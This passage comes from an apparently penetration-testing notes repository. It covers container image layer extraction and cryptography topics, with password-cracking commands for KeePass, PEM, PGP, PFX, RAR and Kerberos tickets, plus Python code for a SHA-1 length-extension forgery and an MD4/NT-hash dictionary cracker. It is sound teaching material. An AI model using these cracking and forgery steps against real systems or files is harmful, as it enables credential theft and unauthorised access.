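    m = json.loads(manifest_json)
    if m.get("schemaVersion") == 1:
        digests = [layer["blobSum"] for layer in reversed(m.get("fsLayers", []))]
    elif "layers" in m:
        digests = [layer["digest"] for layer in m["layers"]]
    elif "manifests" in m:
        raise ValueError("manifest list: request one platform's manifest by digest first")
    else:
        raise ValueError("unrecognised manifest format")
    seen, unique = set(), []
    for d in digests:
        if not d.startswith("sha256:") or len(d) != 71:
            raise ValueError(f"unexpected digest {d!r}")
        if d not in seen:
            seen.add(d)
            unique.append(d)
    return unique


def blob_urls(registry: str, name: str, manifest_json: str, include_config: bool = True) -> list:
    """URLs to fetch (curl -so N.tar <url> && tar -xvf N.tar), base layer first."""
    digests = layer_digests(manifest_json)
    m = json.loads(manifest_json)
    if include_config and "config" in m:
        digests.append(m["config"]["digest"])  # image config: ENV, CMD, build history
    return [f"{registry}/v2/{name}/blobs/{d}" for d in digests]
```

Extracting layers base-first and letting later layers overwrite earlier files reproduces the image's final filesystem; the config blob is worth reading too, since `ENV` lines and build history in it regularly contain credentials that never made it into a layer.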
--------------------------------------------------------------------------------
/src/exploit/container/kubernetes/_data.yml:
--------------------------------------------------------------------------------
1 | category2: kubernetes
--------------------------------------------------------------------------------
/src/exploit/cryptography/_data.yml:
--------------------------------------------------------------------------------
1 | category1: cryptography
2 | related_menus:
3 | - title: Algorithm
4 |   id: algorithm
5 | - title: Key Derivation Function
6 |   id: key-derivation-function
7 | - title: Tool
8 |   id: tool
9 | - title: Math
10 |   id: math
11 | - title: Bit Wise Operation
12 |   id: bit-wise-operation
13 | - title: Conversion
14 |   id: conversion
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/_data.yml:
--------------------------------------------------------------------------------
1 | category2: algorithm
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/atbash-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Atbash Cipher
3 | description: Atbash Cipher is a monoalphabetic substitution cipher originally used to encrypt the Hebrew alphabet.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-10
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[Atbash Cipher Tool](https://www.boxentriq.com/code-breaking/atbash-cipher)**
14 |
15 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/caesar-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Caesar Cipher
3 | description: Caesar Cipher is one of the simplest and most widely known encryption techniques.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-10
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[Caesar Cipher Encoder/Decoder](https://www.dcode.fr/caesar-cipher)**
14 |
15 |
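The following is an added example, not code from the original page: it tries all 26 shifts and ranks the candidates by how closely their letter frequencies match English, which is what the linked online solver does behind the scenes. The sample text is constructed for the example.

```python
# Added example (not from the original page): brute-force a Caesar cipher and
# pick the most English-looking shift with a chi-squared frequency test.
import string

# Relative English letter frequencies in percent, a to z
ENGLISH_FREQ = [8.2, 1.5, 2.8, 4.3, 12.7, 2.2, 2.0, 6.1, 7.0, 0.15, 0.77, 4.0, 2.4,
                6.7, 7.5, 1.9, 0.095, 6.0, 6.3, 9.1, 2.8, 0.98, 2.4, 0.15, 2.0, 0.074]


def caesar_shift(text: str, shift: int) -> str:
    """Shift letters by `shift` positions; case and non-letters are preserved."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def chi_squared(text: str) -> float:
    """Distance from English letter frequencies (lower is more English-like)."""
    letters = [c for c in text.lower() if "a" <= c <= "z"]
    if not letters:
        return float("inf")
    n = len(letters)
    counts = [letters.count(c) for c in string.ascii_lowercase]
    return sum((obs - n * f / 100) ** 2 / (n * f / 100)
               for obs, f in zip(counts, ENGLISH_FREQ))


def crack_caesar(ciphertext: str) -> list:
    """All 26 decryptions as (shift, plaintext), most English-looking first."""
    candidates = [(shift, caesar_shift(ciphertext, -shift)) for shift in range(26)]
    return sorted(candidates, key=lambda c: chi_squared(c[1]))


if __name__ == "__main__":
    sample = caesar_shift("the secret meeting will take place at the old mill tonight", 7)
    for shift, plaintext in crack_caesar(sample)[:3]:
        print(shift, plaintext)
```

For very short ciphertexts the frequency ranking can pick the wrong shift, so the function returns all 26 candidates rather than just the top one.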
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/camellia-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Camellia Cipher
3 | description: Camellia is a symmetric key block cipher with a block size of 128 bits and key sizes of 128, 192 and 256 bits.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-21
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | ```bash
14 | # Camellia is one of the symmetric ciphers OpenPGP supports, so gpg detects it from the packet headers and prompts for the passphrase (or uses the matching private key) without any extra option.
15 | gpg --decrypt encrypted.gpg
16 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/ecc.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ECC (Elliptic Curve Cryptography)
3 | description: Elliptic Curve Cryptography is an approach to public-key cryptography based on the algebraic structure of elliptic curves over finite fields.
4 | tags:
5 | - Cryptography
6 | refs:
7 | - https://en.wikipedia.org/wiki/Elliptic-curve_cryptography
8 | date: 2023-09-09
9 | draft: false
10 | ---
11 |
12 | *This article has little content yet.*
13 |
14 | ## Formula
15 |
16 | ```python
17 | # Short Weierstrass form. In cryptography the curve is taken over a finite field,
18 | # i.e. both sides are reduced modulo a prime p, with 4*a**3 + 27*b**2 != 0.
19 | Y**2 = X**3 + a*X + b
20 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/ecdsa.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ECDSA (Elliptic Curve Digital Signature Algorithm)
3 | description: ECDSA offers a variant of the DSA which uses elliptic curve cryptography.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-09-09
8 | draft: false
9 | ---
10 |
11 | ## ECDSA in Python
12 |
13 | [python-ecdsa](https://github.com/tlsfuzzer/python-ecdsa) can be used for ECDSA.
14 |
15 | ```bash
16 | pip install ecdsa
17 | ```
18 |
19 | ### Verifying
20 |
21 | ```python
22 | from ecdsa import SigningKey, NIST384p
23 |
24 | sk = SigningKey.generate(curve=NIST384p)
25 | vk = sk.verifying_key
26 | signature = sk.sign(b"message")
27 | print(vk.verify(signature, b"message"))
28 | ```
29 |
30 | ### Generating SigningKey
31 |
32 | ```python
33 | from ecdsa import SigningKey, NIST384p
34 |
35 | sk = SigningKey.generate(curve=NIST384p)
36 | sk_string = sk.to_string()
37 | print(sk_string.hex())
38 |
39 | sk2 = SigningKey.from_string(sk_string, curve=NIST384p)
40 | print(sk2.to_string().hex())
41 | ```
42 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/fernet.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Fernet
3 | description: Fernet is a symmetric authenticated encryption scheme (AES-128-CBC with an HMAC-SHA256 tag) that produces base64url tokens.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-03-07
8 | draft: false
9 | ---
10 |
11 | ## Decrypt
12 |
13 | There are many online tools, such as:
14 |
15 | - [https://asecuritysite.com/tokens/ferdecode](https://asecuritysite.com/tokens/ferdecode)
16 | - [https://8gwifi.org/fernet.jsp](https://8gwifi.org/fernet.jsp)
17 |
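The following is an added example, not code from the original page: it pulls a Fernet token apart the way the linked online decoders do and verifies its HMAC when the key is known. The layout follows the Fernet spec: `base64url( 0x80 | timestamp (8 bytes, big-endian) | IV (16) | AES-128-CBC ciphertext | HMAC-SHA256 (32) )`, with the 32-byte key split into a signing half (first 16 bytes) and an encryption half (last 16). The key and token are constructed in the block; the "ciphertext" is arbitrary bytes, since AES is not in the standard library and only the structure and the MAC check are shown.

```python
# Added example (not from the original page): parse a Fernet token and check
# its HMAC. Key and token are constructed here; no real encryption is done.
import base64
import hashlib
import hmac
import struct

DEMO_KEY = base64.urlsafe_b64encode(bytes(range(32))).decode()        # constructed, never use
OTHER_KEY = base64.urlsafe_b64encode(bytes(range(32, 64))).decode()   # a second, wrong key


def make_token(key_b64: str, ciphertext: bytes, iv: bytes, timestamp: int) -> str:
    """Assemble and sign a token around already-encrypted bytes."""
    signing_key = base64.urlsafe_b64decode(key_b64)[:16]
    body = b"\x80" + struct.pack(">Q", timestamp) + iv + ciphertext
    tag = hmac.new(signing_key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()


def decode_token(token: str, key_b64: str = None) -> dict:
    """Split a token into its fields; with the key, also check the HMAC."""
    raw = base64.urlsafe_b64decode(token)
    if not raw or raw[0] != 0x80:
        raise ValueError("not a Fernet token: bad version byte")
    if len(raw) < 1 + 8 + 16 + 32:
        raise ValueError("token too short")
    fields = {
        "timestamp": struct.unpack(">Q", raw[1:9])[0],  # Unix seconds, used for TTL checks
        "iv": raw[9:25],
        "ciphertext": raw[25:-32],
        "hmac": raw[-32:],
        "hmac_valid": None,  # unknown without the key
    }
    if key_b64 is not None:
        key = base64.urlsafe_b64decode(key_b64)
        if len(key) != 32:
            raise ValueError("Fernet key must decode to 32 bytes")
        expected = hmac.new(key[:16], raw[:-32], hashlib.sha256).digest()
        fields["hmac_valid"] = hmac.compare_digest(expected, raw[-32:])
    return fields


def tamper(token: str) -> str:
    """Flip one bit of the ciphertext to show that the MAC catches modification."""
    raw = bytearray(base64.urlsafe_b64decode(token))
    raw[25] ^= 0x01
    return base64.urlsafe_b64encode(bytes(raw)).decode()
```

Without the key a decoder can still read the version, timestamp and IV, which is all the online tools show; the timestamp in particular leaks when a token was minted and whether a TTL check would still accept it.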
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/hmac.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: HMAC
3 | description: An HMAC is a specific type of message authentication code involving a cryptographic hash function and a secret cryptographic key.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-10
8 | draft: false
9 | ---
10 |
11 | ## Install HMAC Commands
12 |
13 | If you don't have the `hmac256` command, install the package that provides it. `hmac256` ships with libgcrypt; the `sha256hmac`/`sha384hmac`/`sha512hmac` commands come from the `hmaccalc` package (Fedora/RHEL), and `openssl dgst -sha256 -hmac <key> file` works wherever OpenSSL is installed.
14 |
15 | ```bash
16 | # In debian
17 | sudo apt install libgcrypt20-dev
18 | ```
19 |
20 |
21 |
22 | ## Compute
23 |
24 | An HMAC is computed and verified, not decrypted: the verifier recomputes the tag with the same key and compares it with the received one.
25 |
26 | ```bash
27 | # HMAC-SHA256 (libgcrypt): the key is the first argument
28 | hmac256 '<key>' example.txt
29 |
30 | # HMAC-SHA256 (hmaccalc)
31 | sha256hmac example.txt --key '<key>'
32 |
33 | # HMAC-SHA384
34 | sha384hmac example.txt --key '<key>'
35 |
36 | # HMAC-SHA512
37 | sha512hmac example.txt --key '<key>'
38 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/kdbx-files.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: KDBX Files
3 | description: A KDBX file is a password database created by KeePass Password Safe.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2024-10-25
8 | draft: false
9 | ---
10 |
11 | ## Open KDBX File
12 |
13 | If KeePass software does not exist in our system, run the following command.
14 |
15 | ```bash
16 | sudo apt install keepassx
17 | # or
18 | sudo apt install keepass2
19 | ```
20 |
21 | To open **KeePass**, run the following command.
22 |
23 | ```sh
24 | keepassx
25 | # or
26 | keepass2
27 | ```
28 |
29 | ### Copy Password
30 |
31 | Right-click on the password value then click **Copy Password**.
32 |
33 |
34 |
35 | ## Crack KDBX Password
36 |
37 | If KeePass asks for the master key when opening the KDBX file, we need to crack the password of the KDBX file. **John the Ripper** (or hashcat) can be used to crack it.
38 |
39 | ### 1. Convert to Hash
40 |
41 | ```sh
42 | keepass2john example.kdbx > hash.txt
43 | ```
44 |
45 | ### 2. Crack the Hash
46 |
47 | ```sh
48 | john --wordlist=wordlist.txt hash.txt
49 | # or
50 | hashcat -m 13400 -a 0 hash.txt wordlist.txt
51 | ```
52 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/kerberos-tgt-cracking.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Kerberos TGT Cracking
3 | description: Kerberos tickets exported from memory (for example with Mimikatz or Rubeus) are often saved with the `.kirbi` extension. A ticket's encrypted part is keyed by the password of the account that issued it, so we may be able to crack that password offline.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-11-11
8 | draft: false
9 | ---
10 |
11 | ## Crack TGT
12 |
13 | First convert the ticket to a hash that **John the Ripper** can crack. Note that a real TGT is encrypted with the `krbtgt` account's key and is not realistically crackable; the tickets worth cracking are service tickets (TGS) encrypted with a service account's password, as in Kerberoasting.
14 |
15 | ```sh
16 | kirbi2john tgt.kirbi > hash.txt
17 | # or
18 | python2 /usr/share/john/kirbi2john.py tgt.kirbi > hash.txt
19 | ```
20 |
21 | Then crack.
22 |
23 | ```sh
24 | john --wordlist=wordlist.txt hash.txt
25 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/length-extension-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Length Extension Attack
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | - https://en.wikipedia.org/wiki/Length_extension_attack
8 | - https://github.com/iagox86/hash_extender
9 | date: 2023-07-28
10 | draft: false
11 | ---
12 |
13 | ## Exploitation
14 |
15 | Merkle-Damgård hashes (MD4, MD5, SHA-1, SHA-256 and others) let anyone who knows `H(secret || message)` and the length of `secret` compute a valid `H(secret || message || padding || extension)` without knowing the secret, because the digest is the hash's internal state after the last block. This is why `H(secret || message)` must not be used as a MAC. We can exploit the vulnerability with [hash_extender](https://github.com/iagox86/hash_extender).
16 |
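The following is an added example, not code from the original page: a length-extension attack on SHA-1 done by hand, the same computation hash_extender automates. SHA-1 is implemented here because the attack needs to resume hashing from an arbitrary internal state, which `hashlib` does not expose. The secret and message are constructed for the example; the attacker side uses only the published digest, the message and the secret's length.

```python
# Added example (not from the original page): SHA-1 with a resumable state and
# a length-extension forgery checked against hashlib.
import hashlib
import struct


def _rol32(v: int, n: int) -> int:
    return ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF


def _sha1_compress(h: list, block: bytes) -> list:
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rol32(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = h
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        temp = (_rol32(a, 5) + (f & 0xFFFFFFFF) + e + k + w[i]) & 0xFFFFFFFF
        a, b, c, d, e = temp, a, _rol32(b, 30), c, d
    return [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d, e))]


def sha1_padding(message_len: int) -> bytes:
    """Merkle-Damgard padding: 0x80, zeros, then the bit length as 8 bytes big-endian."""
    return b"\x80" + b"\x00" * ((55 - message_len) % 64) + struct.pack(">Q", message_len * 8)


def sha1(data: bytes, state=None, prior_len: int = 0) -> bytes:
    """SHA-1 of data. With `state` and `prior_len` (a multiple of 64) it resumes
    as if `prior_len` bytes had already been absorbed into `state`."""
    h = list(state) if state else [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]
    padded = data + sha1_padding(prior_len + len(data))
    for i in range(0, len(padded), 64):
        h = _sha1_compress(h, padded[i:i + 64])
    return struct.pack(">5I", *h)


def length_extend(known_digest: bytes, known_len: int, extension: bytes):
    """Given H(secret||msg) and len(secret||msg), forge H(secret||msg||glue||extension).
    Returns (suffix to append to msg, forged digest)."""
    state = struct.unpack(">5I", known_digest)       # the digest IS the internal state
    glue = sha1_padding(known_len)                    # the padding the server applied
    forged = sha1(extension, state=state, prior_len=known_len + len(glue))
    return glue + extension, forged


def demo_forgery(secret: bytes, message: bytes, extension: bytes) -> bool:
    """Attacker knows len(secret), message and its tag; server recomputes with
    the real secret. Returns True when the forged tag is accepted."""
    tag = hashlib.sha1(secret + message).digest()    # what the server published
    suffix, forged_tag = length_extend(tag, len(secret) + len(message), extension)
    return hashlib.sha1(secret + message + suffix).digest() == forged_tag
```

When the secret's length is unknown, the attacker simply tries each plausible length and submits every resulting `(message + suffix, forged_tag)` pair; only one of them verifies, which is exactly what hash_extender's `--secret-min`/`--secret-max` loop does.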
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/md4-md5.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: MD4, MD5
3 | description: MD4 and MD5 (message-digest) are widely used hash functions producing a 128-bit hash value. Both are cryptographically broken and only survive in legacy formats.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-01-05
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[MD5 Center](https://md5.gromweb.com/)**
14 | - **[CrackStation](https://crackstation.net/)**
15 | - **[Hashes.com](https://hashes.com/en/decrypt/hash)**
16 |
17 |
18 |
19 | ## Crack
20 |
21 | ### MD4
22 |
23 | Put the MD4 hash into a file.
24 |
25 | ```sh
26 | echo -n '<hash>' > hash.txt
27 | ```
27 | ```
28 |
29 | Then crack it.
30 |
31 | ```sh
32 | john --format=raw-md4 --wordlist=wordlist.txt hash.txt
33 | # or
34 | hashcat -m 900 -a 0 hash.txt wordlist.txt
35 | ```
36 |
37 | ### MD5
38 |
39 | Put the MD5 hash into a file.
40 |
41 | ```sh
42 | echo -n '<hash>' > hash.txt
43 | ```
44 |
45 | Then crack it.
46 |
47 | ```sh
48 | john --format=raw-md5 --wordlist=wordlist.txt hash.txt
49 | # or
50 | hashcat -m 0 -a 0 hash.txt wordlist.txt
51 | ```
52 |
53 |
54 |
55 | ## Hash
56 |
57 | ### MD4
58 |
59 | No contents yet
60 |
61 | ### MD5
62 |
63 | ```sh
64 | echo -n 'hello' | md5sum
65 | md5sum sample.txt
66 | ```
67 |
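The following is an added example, not code from the original page: MD4 in pure Python plus a small wordlist check. Modern OpenSSL builds ship MD4 only in the "legacy" provider, so `hashlib.new("md4")` often fails; this keeps raw-MD4 work self-contained. The wordlist is constructed for the example.

```python
# Added example (not from the original page): MD4 from RFC 1320 in pure Python,
# an NT-hash helper on top of it, and a dictionary check.
import struct


def _rol32(v: int, n: int) -> int:
    return ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    # Padding is the same as MD5: 0x80, zeros, 64-bit little-endian bit length
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Round 1: F = (x & y) | (~x & z), words in order, shifts 3, 7, 11, 19
        for i in range(16):
            f = (b & c) | (~b & d)
            a, b, c, d = d, _rol32((a + f + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4]), b, c
        # Round 2: G = majority, words 0,4,8,12,1,5,..., shifts 3, 5, 9, 13, constant sqrt(2)
        for i in range(16):
            k = (i % 4) * 4 + i // 4
            g = (b & c) | (b & d) | (c & d)
            a, b, c, d = d, _rol32((a + g + x[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4]), b, c
        # Round 3: H = xor, words 0,8,4,12,2,10,..., shifts 3, 9, 11, 15, constant sqrt(3)
        for i in range(16):
            k = int(f"{i:04b}"[::-1], 2)  # bit-reversed word index
            h = b ^ c ^ d
            a, b, c, d = d, _rol32((a + h + x[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def ntlm_hash(password: str) -> str:
    """Windows NT hash: MD4 over the UTF-16LE password (john --format=nt, hashcat -m 1000)."""
    return md4(password.encode("utf-16le")).hex()


def crack_hash(target_hex: str, wordlist, hash_fn=md4):
    """Dictionary attack: return the first candidate whose hash matches, else None."""
    target = target_hex.lower()
    for word in wordlist:
        if hash_fn(word).hex() == target:
            return word
    return None
```

The same dictionary loop with `hashlib.md5` in place of `md4` is all `john --format=raw-md5` does, only far slower; the point of the block is having a working MD4 on systems where the OpenSSL legacy provider is disabled.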
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/multi-tap-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Multi-Tap Cipher
3 | description: Multi-Tap refers to a text entry system for mobile phones.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-21
8 | draft: false
9 | ---
10 |
11 | ## Online Tools
12 |
13 | - **[Multitap Decoder](https://www.dcode.fr/multitap-abc-cipher)**
14 |
15 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/pem.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: PEM (Privacy Enhanced Mail)
3 | description: PEM is a Base64 text encoding (with BEGIN/END headers) for keys and certificates. An encrypted PEM private key is protected by a passphrase, which can be cracked.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Crack the Passphrase
12 |
13 | First of all, convert the encrypted PEM private key to a hash format that John can recognize.
14 |
15 | ```sh
16 | pem2john example.pem > hash.txt
17 | ```
18 |
19 | Crack the hash.
20 |
21 | ```sh
22 | john --wordlist=wordlist.txt hash.txt
23 | ```
24 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/pgp.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: PGP (Pretty Good Privacy)
3 | description: PGP is an encryption program that provides cryptographic privacy and authentication for data communication.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-20
8 | draft: false
9 | ---
10 |
11 | ## Crack the Private Key Passphrase
12 |
13 | First off, convert the private key to a hash format that John can recognize.
14 |
15 | ```sh
16 | gpg2john private.key > hash.txt
17 | ```
18 |
19 | Crack the passphrase using John the Ripper.
20 |
21 | ```sh
22 | john --wordlist=wordlist.txt hash.txt
23 | ```
24 |
25 |
26 |
27 | ## Decode Public Key
28 |
29 | There are some online tools for dumping the packets of a public key:
30 |
31 | - **[PGPDump](https://8gwifi.org/pgpdump.jsp)**
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/pkcs.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: PKCS (Public-Key Cryptography Standards)
3 | description: PKCS are a group of public-key cryptography standards.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Crack the Password
12 |
13 | ### PKCS#12
14 |
15 | First of all, convert the PKCS#12 file to a hash format that John can recognize.
16 |
17 | ```sh
18 | pfx2john example.pfx > hash.txt
19 | ```
20 |
21 | Crack the password using the formatted text.
22 |
23 | ```sh
24 | john --wordlist=wordlist.txt hash.txt
25 | ```
26 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/rar.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: RAR (Roshal Archive)
3 | description: RAR is a proprietary archive file format that supports data compression, error correction and file spanning.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-22
8 | draft: false
9 | ---
10 |
11 | ## Crack the Password
12 |
13 | First of all, convert the RAR file to a hash format that John can recognize.
14 |
15 | ```sh
16 | rar2john example.rar > hash.txt
17 | ```
18 |
19 | Crack the password using the formatted text.
20 |
21 | ```sh
22 | john --wordlist=wordlist.txt hash.txt
23 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/ripemd.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: RIPEMD
3 | description: RIPEMD (RIPE Message Digest) is a family of cryptographic hash functions developed in 1992.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-03-07
8 | draft: false
9 | ---
10 |
11 | ## Compute or Look Up
12 |
13 | RIPEMD is a hash, so it cannot be decrypted: CyberChef computes RIPEMD digests (the recipe below uses RIPEMD-320), and sites like md5hashing.net look up known preimages of a given hash. For example,
14 |
15 | - [https://gchq.github.io/CyberChef/#recipe=RIPEMD('320')](https://gchq.github.io/CyberChef/#recipe=RIPEMD('320'))
16 | - [https://md5hashing.net/hash/ripemd160](https://md5hashing.net/hash/ripemd160)
17 |
18 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/rot13-rot47.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ROT13, ROT47
3 | description: ROT13 (rotate by 13 places), ROT47 (rotate by 47 places) are simple letter substitution ciphers.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2022-12-22
8 | draft: false
9 | ---
10 |
11 | ## Decode
12 |
13 | **[CyberChef](https://gchq.github.io/CyberChef/)** is a useful online tool for decoding ROT13 and ROT47.
14 |
15 |
16 |
17 | ## Encode
18 |
19 | ### ROT13
20 |
21 | ```sh
22 | echo hello | tr 'A-Za-z' 'N-ZA-Mn-za-m'
23 | ```
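The `tr` one-liner above covers ROT13 only. The following is an added example (not code from Exploit Notes) that implements ROT13, ROT47 and the general rotation in Python, plus a brute-force over all 26 Caesar shifts, which is how an unknown rotation is usually recovered in practice. All function names are this example's own.

```python
# Added example (not from Exploit Notes): ROT13 and ROT47 in pure Python,
# plus a brute-force over all 26 Caesar shifts.

LOWER = "abcdefghijklmnopqrstuvwxyz"
UPPER = LOWER.upper()


def rot_n(text: str, n: int) -> str:
    """Rotate ASCII letters by n places (ROT13 is rot_n(text, 13)).
    Non-letters are left untouched, as in `tr 'A-Za-z' 'N-ZA-Mn-za-m'`."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + n) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + n) % 26])
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    # ROT13 is its own inverse: rot13(rot13(x)) == x, because 13 * 2 == 26.
    return rot_n(text, 13)


def rot47(text: str) -> str:
    """ROT47 rotates every printable ASCII character '!' (33) .. '~' (126),
    94 characters in total, by 47 places, so digits and punctuation change too.
    It is also self-inverse because 47 * 2 == 94."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr((code - 33 + 47) % 94 + 33))
        else:
            out.append(ch)
    return "".join(out)


def caesar_candidates(text: str) -> list:
    """Return all 26 rotations of text; a ROT-obfuscated string is recovered
    by scanning this list for readable output (shift 0 is the input itself)."""
    return [rot_n(text, n) for n in range(26)]


if __name__ == "__main__":
    print(rot13("hello"))            # uryyb
    print(rot47("Hello, World!"))    # w6==@[ (@C=5P
```

Because both ciphers are self-inverse, the same function encodes and decodes; ROT-family encodings hide nothing from anyone who knows they are in use.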
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/transposition-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Transposition Cipher
3 | description: Transposition Cipher is a method of encryption which scrambles the positions of characters without changing the characters themselves.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-02-21
8 | draft: false
9 | ---
10 |
11 | ## Decode
12 |
13 | - **[Online Decoder](https://www.dcode.fr/transposition-cipher)**
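As an added example (not code from Exploit Notes or the linked decoder), here is a columnar transposition cipher, the classic transposition scheme: the text is written row by row under a key word and read out column by column in the alphabetical order of the key letters. The padding character and the function names are assumptions of this example.

```python
import math

# Added example (not from Exploit Notes): columnar transposition cipher.
# PAD_CHAR is an assumption of this example; real implementations vary.
PAD_CHAR = "X"


def _column_order(key: str) -> list:
    # Columns are read in alphabetical order of the key letters;
    # duplicate letters are ordered left to right.
    return sorted(range(len(key)), key=lambda i: (key[i], i))


def columnar_encrypt(plaintext: str, key: str) -> str:
    ncols = len(key)
    nrows = math.ceil(len(plaintext) / ncols)
    padded = plaintext.ljust(nrows * ncols, PAD_CHAR)
    rows = [padded[r * ncols:(r + 1) * ncols] for r in range(nrows)]
    # Write row by row, read column by column in key order.
    return "".join(rows[r][c] for c in _column_order(key) for r in range(nrows))


def columnar_decrypt(ciphertext: str, key: str) -> str:
    ncols = len(key)
    if len(ciphertext) % ncols:
        raise ValueError("ciphertext length is not a multiple of the key length")
    nrows = len(ciphertext) // ncols
    columns = {}
    pos = 0
    for c in _column_order(key):
        columns[c] = ciphertext[pos:pos + nrows]
        pos += nrows
    # Read the grid back row by row; trailing padding is kept so the caller
    # can decide how to strip it.
    return "".join(columns[c][r] for r in range(nrows) for c in range(ncols))


def same_multiset(a: str, b: str) -> bool:
    # Transposition never changes which characters occur, only where: the
    # letter frequencies of plaintext and ciphertext are identical, which is
    # the tell-tale sign that a transposition (not a substitution) was used.
    return sorted(a) == sorted(b)
```

The `same_multiset` check is the practical identification step: if a ciphertext has the letter frequencies of ordinary English text, suspect a transposition rather than a substitution cipher.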
--------------------------------------------------------------------------------
/src/exploit/cryptography/algorithm/vigenere-cipher.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Vigenere Cipher
3 | description: Vigenere Cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-03-28
